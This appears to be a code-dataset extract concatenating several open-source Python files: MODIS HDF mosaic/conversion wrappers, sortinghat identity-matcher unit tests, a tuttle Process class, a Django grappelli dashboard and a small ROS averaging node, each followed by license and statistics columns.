listHDF.append(i.strip())
self.tmplistfiles.write("{name}\n".format(name=os.path.join(self.fullpath, i.strip())))
pmm = parseModisMulti(listHDF)
pmm.writexml(self.outxml)
self.tmplistfiles.close()
def executable(self):
"""Return the executable of mrtmosaic MRT software"""
if sys.platform.count('linux'):
if os.path.exists(os.path.join(self.mrtpathbin, 'mrtmosaic')):
return os.path.join(self.mrtpathbin, 'mrtmosaic')
elif sys.platform.count('win32'):
if os.path.exists(os.path.join(self.mrtpathbin, 'mrtmosaic.exe')):
return os.path.join(self.mrtpathbin, 'mrtmosaic.exe')
def run(self):
"""Exect the mosaic process"""
import subprocess
execut = self.executable()
if not os.path.exists(execut):
raise IOError('The path {name} does not exist, it could be an '
'erroneus path or software'.format(name=execut))
else:
self.write_mosaic_xml()
if self.subset:
subprocess.call([execut, '-i', self.tmplistfiles.name, '-o',
self.out, '-s', self.subset],
stderr=subprocess.STDOUT)
else:
subprocess.call([execut, '-i', self.tmplistfiles.name, '-o',
self.out], stderr=subprocess.STDOUT)
return "The mosaic file {name} has been created".format(name=self.out)
class processModis:
"""A class to process raw modis data from hdf to tif using swath2grid
(from MRT Swath tools)
:param str hdfname: the full path to the hdf file
:param str confile: the full path to the paramater file
:param str mrtpath: the full path to mrt directory which contains
the bin and data directories
"""
def __init__(self, hdfname, confile, mrtpath):
"""Function to initialize the object"""
# check if the hdf file exists
if os.path.exists(hdfname):
self.name = hdfname
else:
raise IOError('%s does not exist' % hdfname)
# check if confile exists
if os.path.exists(confile):
self.conf = confile
else:
raise IOError('%s does not exist' % confile)
# check if mrtpath and subdirectories exists and set environment
# variables
self.mrtpathbin, self.mrtpathdata = checkMRTpath(mrtpath)
def executable(self):
"""Return the executable of resample MRT software"""
if sys.platform.count('linux') != -1:
if os.path.exists(os.path.join(self.mrtpathbin, 'swath2grid')):
return os.path.join(self.mrtpathbin, 'swath2grid')
elif sys.platform.count('win32') != -1:
if os.path.exists(os.path.join(self.mrtpathbin, 'swath2grid.exe')):
return os.path.join(self.mrtpathbin, 'swath2grid.exe')
def run(self):
"""Exec the convertion process"""
import subprocess
execut = self.executable()
if not os.path.exists(execut):
raise IOError('The path {name} does not exist, it could be an '
'erroneus path or software'.format(name=execut))
else:
subprocess.call([execut, '-pf={name}'.format(name=self.conf)])
return "The hdf file {name} has been converted".format(name=self.name)
|
gpl-2.0
| 3,430,796,322,326,660,000
| 41.649351
| 103
| 0.593991
| false
| 3.830482
| false
| false
| false
|
MetricsGrimoire/sortinghat
|
tests/test_matcher.py
|
1
|
11000
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2014-2017 Bitergia
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors:
# Santiago Dueñas <sduenas@bitergia.com>
#
import sys
import unittest
if '..' not in sys.path:
sys.path.insert(0, '..')
from sortinghat.db.model import UniqueIdentity, Identity, MatchingBlacklist
from sortinghat.exceptions import MatcherNotSupportedError
from sortinghat.matcher import IdentityMatcher, create_identity_matcher, match
from sortinghat.matching import EmailMatcher, EmailNameMatcher
class TestCreateIdentityMatcher(unittest.TestCase):
def test_identity_matcher_instance(self):
"""Test if the factory function returns an identity matcher instance"""
matcher = create_identity_matcher('default')
self.assertIsInstance(matcher, IdentityMatcher)
matcher = create_identity_matcher('email')
self.assertIsInstance(matcher, EmailMatcher)
matcher = create_identity_matcher('email-name')
self.assertIsInstance(matcher, EmailNameMatcher)
def test_identity_matcher_instance_with_blacklist(self):
"""Test if the factory function adds a blacklist to the matcher instance"""
# The blacklist is empty
matcher = create_identity_matcher('default')
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(len(matcher.blacklist), 0)
# Create a matcher with a blacklist
blacklist = [MatchingBlacklist(excluded='JSMITH@example.com'),
MatchingBlacklist(excluded='jrae@example.com'),
MatchingBlacklist(excluded='jrae@example.net'),
MatchingBlacklist(excluded='John Smith'),
MatchingBlacklist(excluded='root')]
matcher = create_identity_matcher('default', blacklist=blacklist)
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(len(matcher.blacklist), 5)
def test_identity_matcher_instance_with_sources_list(self):
"""Test if the factory function adds a sources list to the matcher instance"""
# The sources list is None
matcher = create_identity_matcher('default')
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(matcher.sources, None)
# Create a matcher with a sources list
sources = ['git', 'jira', 'github']
matcher = create_identity_matcher('default', sources=sources)
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(len(matcher.sources), 3)
def test_identity_matcher_instance_with_strict(self):
"""Test if the factory function adds the strict mode to the matcher instance"""
matcher = create_identity_matcher('default')
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(matcher.strict, True)
matcher = create_identity_matcher('default', strict=False)
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(matcher.strict, False)
def test_not_supported_matcher(self):
"""Check if an exception is raised when the given matcher type is not supported"""
self.assertRaises(MatcherNotSupportedError,
create_identity_matcher, 'custom')
class TestIdentityMatcher(unittest.TestCase):
"""Test IdentityMatcher class"""
def test_blacklist(self):
"""Test blacklist contents"""
m = IdentityMatcher()
self.assertListEqual(m.blacklist, [])
m = IdentityMatcher(blacklist=[])
self.assertListEqual(m.blacklist, [])
blacklist = [MatchingBlacklist(excluded='JSMITH@example.com'),
MatchingBlacklist(excluded='jrae@example.com'),
MatchingBlacklist(excluded='jrae@example.net'),
MatchingBlacklist(excluded='John Smith'),
MatchingBlacklist(excluded='root')]
m = IdentityMatcher(blacklist=blacklist)
self.assertListEqual(m.blacklist, ['john smith', 'jrae@example.com',
'jrae@example.net', 'jsmith@example.com',
'root'])
def test_sources_list(self):
"""Test sources list contents"""
m = IdentityMatcher()
self.assertEqual(m.sources, None)
m = IdentityMatcher(sourecs=[])
self.assertEqual(m.sources, None)
sources = ['git', 'Jira', 'GitHub']
m = IdentityMatcher(sources=sources)
self.assertListEqual(m.sources, ['git', 'github', 'jira'])
def test_strict_mode(self):
"""Test strict mode value"""
m = IdentityMatcher()
self.assertEqual(m.strict, True)
m = IdentityMatcher(strict=False)
self.assertEqual(m.strict, False)
class TestMatch(unittest.TestCase):
"""Test match function"""
def setUp(self):
# Add some unique identities
self.john_smith = UniqueIdentity('John Smith')
self.john_smith.identities = [Identity(email='jsmith@example.com', name='John Smith',
source='scm', uuid='John Smith'),
Identity(name='John Smith',
source='scm', uuid='John Smith'),
Identity(username='jsmith',
source='scm', uuid='John Smith')]
self.jsmith = UniqueIdentity('J. Smith')
self.jsmith.identities = [Identity(name='J. Smith', username='john_smith',
source='alt', uuid='J. Smith'),
Identity(name='John Smith', username='jsmith',
source='alt', uuid='J. Smith'),
Identity(email='jsmith',
source='alt', uuid='J. Smith')]
self.jane_rae = UniqueIdentity('Jane Rae')
self.jane_rae.identities = [Identity(name='Janer Rae',
source='mls', uuid='Jane Rae'),
Identity(email='jane.rae@example.net', name='Jane Rae Doe',
source='mls', uuid='Jane Rae')]
self.js_alt = UniqueIdentity('john_smith')
self.js_alt.identities = [Identity(name='J. Smith', username='john_smith',
source='scm', uuid='john_smith'),
Identity(username='john_smith',
source='mls', uuid='john_smith'),
Identity(username='Smith. J',
source='mls', uuid='john_smith'),
Identity(email='JSmith@example.com', name='Smith. J',
source='mls', uuid='john_smith')]
self.jrae = UniqueIdentity('jrae')
self.jrae.identities = [Identity(email='jrae@example.net', name='Jane Rae Doe',
source='mls', uuid='jrae'),
Identity(name='jrae', source='mls', uuid='jrae'),
Identity(name='jrae', source='scm', uuid='jrae')]
def test_match_email(self):
"""Test whether the function finds every possible matching using email matcher"""
uidentities = [self.jsmith, self.jrae, self.js_alt,
self.john_smith, self.jane_rae]
matcher = EmailMatcher()
result = match([], matcher)
self.assertEqual(len(result), 0)
result = match(uidentities, matcher)
self.assertEqual(len(result), 4)
self.assertListEqual(result,
[[self.john_smith, self.js_alt],
[self.jane_rae], [self.jrae], [self.jsmith]])
def test_match_email_name(self):
"""Test whether the function finds every possible matching using email-name matcher"""
uidentities = [self.jsmith, self.jrae, self.js_alt,
self.john_smith, self.jane_rae]
matcher = EmailNameMatcher()
result = match([], matcher)
self.assertEqual(len(result), 0)
result = match(uidentities, matcher)
self.assertEqual(len(result), 2)
self.assertListEqual(result,
[[self.jsmith, self.john_smith, self.js_alt],
[self.jane_rae, self.jrae]])
def test_match_email_fast_mode(self):
"""Test matching in fast mode using email matcher"""
uidentities = [self.jsmith, self.jrae, self.js_alt,
self.john_smith, self.jane_rae]
matcher = EmailMatcher()
result = match([], matcher, fastmode=True)
self.assertEqual(len(result), 0)
result = match(uidentities, matcher, fastmode=True)
self.assertEqual(len(result), 4)
self.assertListEqual(result,
[[self.john_smith, self.js_alt],
[self.jane_rae], [self.jrae], [self.jsmith]])
def test_match_email_name_fast_mode(self):
"""Test matching in fast mode using email-name matcher"""
uidentities = [self.jsmith, self.jrae, self.js_alt,
self.john_smith, self.jane_rae]
matcher = EmailNameMatcher()
result = match([], matcher, fastmode=True)
self.assertEqual(len(result), 0)
result = match(uidentities, matcher, fastmode=True)
self.assertEqual(len(result), 2)
self.assertListEqual(result,
[[self.jsmith, self.john_smith, self.js_alt],
[self.jane_rae, self.jrae]])
def test_matcher_error(self):
"""Test if it raises an error when the matcher is not valid"""
self.assertRaises(TypeError, match, [], None)
self.assertRaises(TypeError, match, [], "")
def test_matcher_not_supported_fast_mode(self):
"""Test if it raises and error when a matcher does not supports the fast mode"""
matcher = IdentityMatcher()
self.assertRaises(MatcherNotSupportedError,
match, [], matcher, True)
if __name__ == "__main__":
unittest.main()
|
gpl-3.0
| 5,165,033,627,049,388,000
| 38.282143
| 95
| 0.582508
| false
| 4.366415
| true
| false
| false
|
lexman/tuttle
|
tuttle/process.py
|
1
|
4297
|
# -*- coding: utf8 -*-
from time import time
class Process:
""" Class wrapping a process. A process has some input resources, some output resources,
some code that produces outputs from inputs, a processor that handle the language specificities
"""
def __init__(self, processor, filename, line_num):
self._start = None
self._end = None
self._processor = processor
self._filename = filename
self._line_num = line_num
self._inputs = []
self._outputs = []
self._code = ""
self.log_stdout = None
self.log_stderr = None
self._reserved_path = None
self._success = None
self._error_message = None
self._id = "{}_{}".format(self._filename, self._line_num)
@property
def start(self):
return self._start
@property
def end(self):
return self._end
@property
def id(self):
return self._id
@property
def code(self):
return self._code
# TODO Use a setter ?
def set_code(self, code):
self._code = code
@property
def success(self):
return self._success
@property
def error_message(self):
return self._error_message
@property
def processor(self):
return self._processor
def add_input(self, input_res):
self._inputs.append(input_res)
def add_output(self, output):
self._outputs.append(output)
def iter_inputs(self):
for res in self._inputs:
yield res
def iter_outputs(self):
for res in self._outputs:
yield res
def has_outputs(self):
return len(self._outputs) > 0
def has_input(self, resource):
return resource in self._inputs
def input_urls(self):
return {resource.url for resource in self._inputs}
def output_urls(self):
return {resource.url for resource in self._outputs}
def sorted_inputs_string(self):
sorted_inputs_urls = sorted([resource.url for resource in self.iter_inputs()])
return ",".join(sorted_inputs_urls)
def depends_on_process(self, process):
""" Returns True if self deprends on a resource created by process"""
for output_resource in process.iter_outputs():
if self.has_input(output_resource):
return True
return False
def pick_an_output(self):
if not self.has_outputs():
return None
return self._outputs[0]
def retrieve_execution_info(self, process):
""" Copy the execution info (all the properties set by function run()) from another process
:param process:
:return:
"""
self._start = process.start
self._end = process.end
self._success = process.success
self.log_stdout = process.log_stdout
self.log_stderr = process.log_stderr
self._reserved_path = process._reserved_path
def reset_execution_info(self):
""" Reset the execution info (all the properties set by function run()) because the resources produced
by this process have been invalidated
:return:
"""
self._start = None
self._end = None
self.log_stdout = None
self.log_stderr = None
self._success = None
def static_check(self):
"""
Runs a verification that the process won't obviously fail. This is used for static analysis before any process
is run
"""
self._processor.static_check(self)
def assign_paths(self, reserved_path, log_stdout, log_stderr):
assert reserved_path is not None
self._reserved_path = reserved_path
self.log_stdout = log_stdout
self.log_stderr = log_stderr
def set_start(self):
self._start = time()
def set_end(self, success, error_msg):
self._end = time()
self._success = success
self._error_message = error_msg
def missing_outputs(self):
"""
:return: True if all input resources for this process exist, False otherwise
"""
result = []
for resource in self.iter_outputs():
if not resource.exists():
result.append(resource)
return result
|
mit
| 1,463,314,768,997,302,000
| 27.091503
| 118
| 0.593903
| false
| 4.344793
| false
| false
| false
|
mennanov/django-blueprint
|
project_name/dashboard.py
|
1
|
3076
|
"""
This file was generated with the customdashboard management command and
contains the class for the main dashboard.
To activate your index dashboard add the following to your settings.py::
GRAPPELLI_INDEX_DASHBOARD = '{{ project_name }}.dashboard.CustomIndexDashboard'
"""
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from grappelli.dashboard import modules, Dashboard
from grappelli.dashboard.utils import get_admin_site_name
class CustomIndexDashboard(Dashboard):
"""
Custom index dashboard for www.
"""
def init_with_context(self, context):
site_name = get_admin_site_name(context)
# append a group for "Administration" & "Applications"
self.children.append(modules.Group(
_('Group: Administration & Applications'),
column=1,
collapsible=True,
children=[
modules.AppList(
_('Applications'),
column=1,
css_classes=('collapse closed',),
exclude=('django.contrib.*',),
),
modules.AppList(
_('Administration'),
column=1,
collapsible=False,
models=('django.contrib.*',),
)
]
))
# append another link list module for "support".
self.children.append(modules.LinkList(
_('Media Management'),
column=2,
children=[
{
'title': _('FileBrowser'),
'url': '/admin/filebrowser/browse/',
'external': False,
},
]
))
# append another link list module for "support".
self.children.append(modules.LinkList(
_('Support'),
column=2,
children=[
{
'title': _('Django Documentation'),
'url': 'http://docs.djangoproject.com/',
'external': True,
},
{
'title': _('Grappelli Documentation'),
'url': 'http://packages.python.org/django-grappelli/',
'external': True,
},
{
'title': _('Grappelli Google-Code'),
'url': 'http://code.google.com/p/django-grappelli/',
'external': True,
},
]
))
# append a feed module
# self.children.append(modules.Feed(
# _('Latest Django News'),
# column=2,
# feed_url='http://www.djangoproject.com/rss/weblog/',
# limit=5
# ))
# append a recent actions module
self.children.append(modules.RecentActions(
_('Recent Actions'),
limit=20,
collapsible=False,
column=3,
))
|
gpl-2.0
| 3,621,246,021,172,486,700
| 30.71134
| 83
| 0.479844
| false
| 5.009772
| false
| false
| false
|
hivebio/ministat-1
|
scripts/avg.py
|
1
|
1025
|
#!/usr/bin/env python
# license removed for brevity
import rospy
from std_msgs.msg import Float32, Int32
sumdata = 0.0
count = 0
def callback(data):
global count, sumdata
sumdata += data.data
count += 1
def listener():
global count, sumdata
pub = rospy.Publisher('avg', Float32, queue_size=10)
# In ROS, nodes are uniquely named. If two nodes with the same
# node are launched, the previous one is kicked off. The
# anonymous=True flag means that rospy will choose a unique
# name for our 'listener' node so that multiple listeners can
# run simultaneously.
rospy.init_node('avg')
rate = rospy.Rate(10) # 10hz
rospy.Subscriber("thermistor", Int32, callback)
while not rospy.is_shutdown():
if count >= 20:
pub.publish(Float32(sumdata/count))
count = 0
sumdata = 0
rate.sleep()
# spin() simply keeps python from exiting until this node is stopped
rospy.spin()
if __name__ == '__main__':
listener()
|
bsd-2-clause
| -5,575,920,084,302,954,000
| 25.973684
| 72
| 0.642927
| false
| 3.768382
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.